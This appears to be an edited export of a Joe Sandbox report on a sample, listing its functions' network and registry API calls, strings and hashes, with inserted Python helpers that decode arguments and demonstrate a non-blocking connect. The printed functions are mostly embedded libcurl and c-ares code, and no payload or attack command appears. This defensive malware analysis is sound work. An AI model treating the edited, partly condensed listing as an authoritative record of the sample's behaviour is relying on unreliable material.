Control-flow Graph (rendered graph; blocks marked Executed / Not Executed): function at 004D7770. Block 4d77b6-4d77c2 calls recv; internal calls to 4d72a0, 4dcb20 and 858c50.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: recv
                                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                      • API String ID: 1507349165-640788491
                                                      • Opcode ID: 48592a5aadbec7caa4675e30f6644ad20c51843398794a077d42af28bcbf09b9
                                                      • Instruction ID: 1d87a757e6883a5f961859fbf53817089ed153b7a1268a1921dffd954a3ce346
                                                      • Opcode Fuzzy Hash: 48592a5aadbec7caa4675e30f6644ad20c51843398794a077d42af28bcbf09b9
                                                      • Instruction Fuzzy Hash: 0B112BB8A093447FE520AB159C5AE277B9CEBC2B68F44091FB80463342F5259D0085B6

Control-flow Graph (rendered graph; blocks marked Executed / Not Executed): function at 0059B180. Block 59b2a9-59b2c7 calls getsockname; internal calls to 59af30, 59b020, 59b060, 59b590, 59b660, 59b770, 59b870 and 858b00.
                                                      APIs
                                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0059B2B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                                      • API String ID: 3358416759-2430778319
                                                      • Opcode ID: 2b75a21f63b74349731503a2e48ae6134800619b17083e02e2791396466eb78e
                                                      • Instruction ID: b55346cbbbd5a17a15440a5e7b86e6aa7087e94a7c6dc83198532bfbdad90022
                                                      • Opcode Fuzzy Hash: 2b75a21f63b74349731503a2e48ae6134800619b17083e02e2791396466eb78e
                                                      • Instruction Fuzzy Hash: 40C18F316043059FFF18DF24DA84A6A7BE1FF88704F058968E8498B3A1EB35ED45CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe73d4babd5c1d0768e9cf5fed8bc047a37ec0b7127130282bf4fe8f556a3038
                                                      • Instruction ID: e4477c04dbd4cd7428c2189a757cd349d0d2576445769599022bff8cad25505b
                                                      • Opcode Fuzzy Hash: fe73d4babd5c1d0768e9cf5fed8bc047a37ec0b7127130282bf4fe8f556a3038
                                                      • Instruction Fuzzy Hash: 3D91353060C3898BD3358A2A88907BBB2D5FFC0371F148B2EE999432D4E7789D41D696
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 0b2e6d4a0975c67da4d3ad627c20980aa991a3b7db926481104ad1f2bb0ca8c2
                                                      • Instruction ID: 2bbfd59026d753503024a6294206f98bc94e969043258de3737c7deff269df7b
                                                      • Opcode Fuzzy Hash: 0b2e6d4a0975c67da4d3ad627c20980aa991a3b7db926481104ad1f2bb0ca8c2
                                                      • Instruction Fuzzy Hash: 483197B4909305DFDB00EFB9D58569EBBF0BF44305F00896AE898A7341EB749A48CF52
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0058AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0058AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0058AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0058AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0058AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0058AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0058B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4217438148-1047472027
                                                      • Opcode ID: b5d88d473e52f46cdf79d24bf6c4594006c5c7f0ecd0999844335f6bdcb30ac1
                                                      • Instruction ID: e05804eddd7a4de003904fb82f571f625f5dd0fa8d3b6c89528c75cd2ac93b0d
                                                      • Opcode Fuzzy Hash: b5d88d473e52f46cdf79d24bf6c4594006c5c7f0ecd0999844335f6bdcb30ac1
                                                      • Instruction Fuzzy Hash: 3B729EB1608301ABF710EB24CC85B6B7BE8BF95700F144829F985EB2A1E775E945CB53
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0050A831
                                                      Strings
                                                      • Trying %s:%d..., xrefs: 0050A7C2, 0050A7DE
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 0050AE1F
                                                      • @, xrefs: 0050AC42
                                                      • bind failed with errno %d: %s, xrefs: 0050B080
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 0050ADAC
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 0050AE60
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0050AD0A
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 0050A796
                                                      • @, xrefs: 0050A8F4
                                                      • Trying [%s]:%d..., xrefs: 0050A689
                                                      • Could not set TCP_NODELAY: %s, xrefs: 0050A871
                                                      • Local port: %hu, xrefs: 0050AF28
                                                      • Bind to local port %d failed, trying next, xrefs: 0050AFE5
                                                      • cf-socket.c, xrefs: 0050A5CD, 0050A735
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0050A6CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: the same 15 associated dump regions (00000000.00000002.2012236196.00000000004D0000 through 00000000.00000002.2013531411.00000000010FA000) as listed for the preceding function; the list is identical for every function in this report and is not repeated here
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: f483d5f484fc63dda6297ebb0f8b46d40ee641f29610413314607d822da978d9
                                                      • Instruction ID: 269e01bf43ca0dd4401a31264f3ac0c216692473c2bfba140fa8b682aa49fc20
                                                      • Opcode Fuzzy Hash: f483d5f484fc63dda6297ebb0f8b46d40ee641f29610413314607d822da978d9
                                                      • Instruction Fuzzy Hash: CD62E171608381ABE721CF24C846BAFBBE4FF85314F044919F98997292E771A945CB93

                                                       Control-flow Graph: function 00599740 (basic blocks 599740 through 59a070; API call nodes RegOpenKeyExA, RegQueryValueExA, RegCloseKey). The rendered graph and its executed/not-executed colouring are not reproduced in this text export.
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00599946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00599974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0059998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: the same 15 associated dump regions (00000000.00000002.2012236196.00000000004D0000 through 00000000.00000002.2013531411.00000000010FA000) as listed for the preceding functions; the list is identical for every function in this report and is not repeated here
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: 84e61e07bd607ba4a2c641a245edabf6bbc1d5cf874e301da068443aaaf1bc26
                                                      • Instruction ID: 6927826f9f9003410290c1cea83b67f6399b47ecff1a216ecc198a075c4f2eea
                                                      • Opcode Fuzzy Hash: 84e61e07bd607ba4a2c641a245edabf6bbc1d5cf874e301da068443aaaf1bc26
                                                      • Instruction Fuzzy Hash: B83298B5904202ABEF11AB24ED46A1B7EE8BF95354F084838FD0997263F721ED15C793
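The argument values in the APIs lines of these entries are raw hex, which hides what the calls actually do. The strings in the two entries above (cf-socket.c, cf_socket_open(), "Could not set TCP_NODELAY", CARES_HOSTS, DatabasePath) are the debug and configuration strings of libcurl's socket code and of c-ares' hosts-file lookup, so these functions are statically linked library code rather than the sample's own logic; System\CurrentControlSet\Services\Tcpip\Parameters\DatabasePath is the registry value that holds the directory of the Windows hosts file, read here with KEY_READ and a MAX_PATH-sized buffer. The annotator below is an added illustration (not Joe Sandbox's, libcurl's or the sample's code) that parses lines in the report's `func.MODULE(args), ref: addr` form and decodes the constants: 0x80000002 = HKEY_LOCAL_MACHINE, 0x20019 = KEY_READ, 0x104 = 260 = MAX_PATH, 6 = IPPROTO_TCP, 1 = TCP_NODELAY. Its table also covers the Winsock SOL_SOCKET (0xFFFF) / SO_ERROR (0x1007) pair used by the connect-verification entry further down the page. The sample lines are copied from this report; all function and table names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: API lines copied verbatim from the "APIs" sections of this
# report (setsockopt entry, Reg* hosts-file entry, getsockopt line of the
# connect-verification entry).
SAMPLE_API_LINES = [
    r"setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0050A831",
    r"RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00599946",
    r"RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00599974",
    r"RegCloseKey.KERNELBASE(?), ref: 0059998B",
    r"getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00508D0E",
]

# Windows SDK constants. Note that SOL_SOCKET is 0xFFFF on Winsock (1 on Linux).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x00020019: "KEY_READ", 0x00020006: "KEY_WRITE", 0x000F003F: "KEY_ALL_ACCESS"}
SOCK_LEVELS = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SOCK_OPTS = {("SOL_SOCKET", 0x1007): "SO_ERROR", ("SOL_SOCKET", 0x0004): "SO_REUSEADDR",
             ("IPPROTO_TCP", 0x0001): "TCP_NODELAY"}

API_LINE = re.compile(r"^(?P<func>\w+)\.(?P<mod>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: str
    notes: Dict[int, str] = field(default_factory=dict)  # argument index -> symbolic name

    def render(self) -> str:
        shown = [self.notes.get(i, a) for i, a in enumerate(self.args)]
        return f"{self.func}.{self.module}({', '.join(shown)}) @ {self.ref}"


def _hex(arg: str) -> Optional[int]:
    """The sandbox prints numeric arguments as bare hex; '?' and strings are not numbers."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_api_line(line: str) -> ApiCall:
    m = API_LINE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    return ApiCall(m["func"], m["mod"], [a.strip() for a in m["args"].split(",")], m["ref"])


def _reg_open(v: List[Optional[int]]) -> Dict[int, str]:
    # RegOpenKeyExA(hKey, lpSubKey, ulOptions, samDesired, phkResult)
    out: Dict[int, str] = {}
    if len(v) > 3:
        if v[0] in HIVES:
            out[0] = HIVES[v[0]]
        if v[3] in KEY_ACCESS:
            out[3] = KEY_ACCESS[v[3]]
    return out


def _reg_query(v: List[Optional[int]]) -> Dict[int, str]:
    # RegQueryValueExA(hKey, lpValueName, lpReserved, lpType, lpData, lpcbData);
    # the report shows the buffer size the last pointer refers to.
    if len(v) > 5 and v[5] is not None:
        return {5: f"cbData={v[5]}" + (" (MAX_PATH)" if v[5] == 260 else "")}
    return {}


def _sockopt(v: List[Optional[int]]) -> Dict[int, str]:
    # setsockopt/getsockopt(s, level, optname, optval, optlen)
    out: Dict[int, str] = {}
    level = SOCK_LEVELS.get(v[1]) if len(v) > 2 else None
    if level:
        out[1] = level
        opt = SOCK_OPTS.get((level, v[2]))
        if opt:
            out[2] = opt
    return out


RULES = {"RegOpenKeyExA": _reg_open, "RegOpenKeyExW": _reg_open,
         "RegQueryValueExA": _reg_query, "RegQueryValueExW": _reg_query,
         "setsockopt": _sockopt, "getsockopt": _sockopt}


def annotate(call: ApiCall) -> ApiCall:
    rule = RULES.get(call.func)
    if rule:
        call.notes = rule([_hex(a) for a in call.args])
    return call


def annotate_lines(lines: List[str]) -> List[str]:
    return [annotate(parse_api_line(line)).render() for line in lines]


if __name__ == "__main__":
    for rendered in annotate_lines(SAMPLE_API_LINES):
        print(rendered)
```

Calls with no rule (RegCloseKey here) are rendered unchanged, so the tool can be run over a whole report and only the arguments it recognises are rewritten; a mis-decoded constant is worse than a raw one, which is why each rule checks the argument count before indexing.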

                                                       Control-flow Graph: function 00508b50 (basic blocks 508b50 through 508f06; API call nodes connect, SleepEx, getsockopt). The rendered graph and its executed/not-executed colouring are not reproduced in this text export.
                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 00508C30
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00508CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00508D0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: the same 15 associated dump regions (00000000.00000002.2012236196.00000000004D0000 through 00000000.00000002.2013531411.00000000010FA000) as listed for the preceding functions; the list is identical for every function in this report and is not repeated here
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: af46befefbc1b6f5051fa1989e8032b4c324e8d5aec59ec08ab2cbb3f213f7c8
                                                      • Instruction ID: 6ec8297eb0084aa9cc25f2812e5146c5d01cadcb5be3275f9d300e1b367f1d0d
                                                      • Opcode Fuzzy Hash: af46befefbc1b6f5051fa1989e8032b4c324e8d5aec59ec08ab2cbb3f213f7c8
                                                      • Instruction Fuzzy Hash: EDB1A070604706AFE710CF24C885FBA7BA4BF95318F148A2DE8995B2D2DB75EC44C762
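The connect / SleepEx / getsockopt(0xFFFF, 0x1007) sequence in this entry is the standard non-blocking connect completion check: connect() returns before the handshake finishes, the caller yields or waits until the socket is writable, then reads SO_ERROR to learn whether the handshake succeeded or which error is pending. The three log strings listed here ("connected", "not connected yet", "connect to %s port %u from %s port %d failed: %s") are exactly its three outcomes. The Python below reproduces the check against a loopback listener so that both the success path and the ECONNREFUSED path can be observed offline. It is an added illustration, not code from the sample or from the library it embeds; the function names, the loopback target and the POSIX errno handling are my own assumptions.

```python
import errno
import select
import socket
from typing import Dict, Tuple


def _failed(code: int) -> str:
    # Report the symbolic errno (e.g. ECONNREFUSED) so results are portable.
    return "failed:" + errno.errorcode.get(code, str(code))


def start_connect(host: str, port: int) -> Tuple[socket.socket, str]:
    """Non-blocking connect(). The call returns before the handshake finishes,
    so the usual state is 'not connected yet' (EINPROGRESS; Winsock reports
    WSAEWOULDBLOCK). Some kernels answer a loopback RST synchronously, which
    is the immediate-failure branch."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setblocking(False)
    rc = s.connect_ex((host, port))
    if rc == 0:
        return s, "connected"
    if rc in (errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN):
        return s, "not connected yet"
    return s, _failed(rc)


def verify_connect(s: socket.socket, timeout: float) -> str:
    """The getsockopt(SOL_SOCKET, SO_ERROR) step: once the socket is writable,
    SO_ERROR is 0 on success or the pending connect error (reading it clears it)."""
    _, writable, _ = select.select([], [s], [], timeout)
    if not writable:
        return "not connected yet"
    err = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
    return "connected" if err == 0 else _failed(err)


def connect_with_check(host: str, port: int, timeout: float = 2.0) -> str:
    s, state = start_connect(host, port)
    try:
        if state == "not connected yet":
            state = verify_connect(s, timeout)
        return state
    finally:
        s.close()


def demo() -> Dict[str, str]:
    """Constructed targets: a loopback listener on an ephemeral port (success
    path) and the same port after the listener is closed (the kernel answers
    the SYN with RST, so SO_ERROR becomes ECONNREFUSED)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    result = {"open": connect_with_check("127.0.0.1", port)}
    listener.close()
    result["closed"] = connect_with_check("127.0.0.1", port)
    return result


if __name__ == "__main__":
    print(demo())  # {'open': 'connected', 'closed': 'failed:ECONNREFUSED'}
```

The point of the SO_ERROR read is that a non-blocking socket becoming writable does not by itself mean success: a refused or reset connection also wakes the writer, and only the pending error distinguishes the two. A "not connected yet" result is what a caller polling with a zero-length SleepEx, as in the listing, loops on until the timeout expires.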

                                                       Control-flow Graph: function 004d2f17 (basic blocks 4d2f17 through 4d31d6; API call nodes RegOpenKeyExA, RegEnumKeyExA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegCloseKey). The rendered graph and its executed/not-executed colouring are not reproduced in this text export.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: the same 15 associated dump regions (00000000.00000002.2012236196.00000000004D0000 through 00000000.00000002.2013531411.00000000010FA000) as listed for the preceding functions; the list is identical for every function in this report and is not repeated here
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: d
                                                      • API String ID: 1332880857-2564639436
                                                      • Opcode ID: 368e000774a9f825193ec1a19b94ef294b625eabf065bd625cb0dad0268f76a8
                                                      • Instruction ID: 7da91b633b5bc2e83e14401f7e5129b28c2382d1ee79973f4b2eefb277db578e
                                                      • Opcode Fuzzy Hash: 368e000774a9f825193ec1a19b94ef294b625eabf065bd625cb0dad0268f76a8
                                                      • Instruction Fuzzy Hash: 827184B49083199FDB10DF69D98579EBBF0BF85308F10886DE89897311D7749A88CF92

                                                       Control-flow Graph: function 004d76a0 (basic blocks 4d76a0 through 4d7762; API call node send). The rendered graph and its executed/not-executed colouring are not reproduced in this text export.
                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=M,00000000,?,?,004E07BF), ref: 004D76EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: the same 15 associated dump regions (00000000.00000002.2012236196.00000000004D0000 through 00000000.00000002.2013531411.00000000010FA000) as listed for the preceding functions; the list is identical for every function in this report and is not repeated here
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=M$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-2691544196
                                                      • Opcode ID: 81c392d4da2fba290c916a3286935d6bf988eddc40f40095e44199a4081bff4c
                                                      • Instruction ID: 6b426b2b7e1260afc725dce712b9710a239fe1c02bc9dbdd09f65385efc5e03b
                                                      • Opcode Fuzzy Hash: 81c392d4da2fba290c916a3286935d6bf988eddc40f40095e44199a4081bff4c
                                                      • Instruction Fuzzy Hash: DB113AB5A093147FE12097259C57E2B7B9CEBC2B2CF450D1BB80863352F5699D0086B6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1296 509290-5092ed call 4d76a0 1299 5093c3-5093ce 1296->1299 1300 5092f3-5092fb 1296->1300 1309 5093d0-5093e1 1299->1309 1310 5093e5-509427 call 4ed090 call 514f40 1299->1310 1301 509301-509333 call 4ed8c0 call 4ed9a0 1300->1301 1302 5093aa-5093af 1300->1302 1321 509335-509364 WSAIoctl 1301->1321 1322 5093a7 1301->1322 1303 5093b5-5093bc 1302->1303 1304 509456-509470 1302->1304 1307 509429-509431 1303->1307 1308 5093be 1303->1308 1312 509433-509437 1307->1312 1313 509439-50943f 1307->1313 1308->1304 1309->1303 1314 5093e3 1309->1314 1310->1304 1310->1307 1312->1304 1312->1313 1313->1304 1317 509441-509453 call 5150a0 1313->1317 1314->1304 1317->1304 1325 509366-50936f 1321->1325 1326 50939b-5093a4 1321->1326 1322->1302 1325->1326 1328 509371-509390 setsockopt 1325->1328 1326->1322 1328->1326 1329 509392-509395 1328->1329 1329->1326
                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0050935D
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00509389
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 9816ee21ff89233cb030f1d1d28438c38fb8b81503b6445118548688a7ca85f0
                                                      • Instruction ID: 59310f16cb0f3fe8a0eb3312eb1197f3d318fb55f3f5c892b956f5dc4354f526
                                                      • Opcode Fuzzy Hash: 9816ee21ff89233cb030f1d1d28438c38fb8b81503b6445118548688a7ca85f0
                                                      • Instruction Fuzzy Hash: C751E570604305ABEB10DF24C881FAABBA5FF84314F148929FD489B2C7E774E991CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1349 4d75e0-4d75ed 1350 4d75ef-4d75f6 1349->1350 1351 4d7607-4d7629 socket 1349->1351 1350->1351 1352 4d75f8-4d75ff 1350->1352 1353 4d763f-4d7642 1351->1353 1354 4d762b-4d763c call 4d72a0 1351->1354 1355 4d7601-4d7602 1352->1355 1356 4d7643-4d7699 call 4d72a0 call 4dcb20 call 858c50 1352->1356 1354->1353 1355->1351
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                      • API String ID: 98920635-842387772
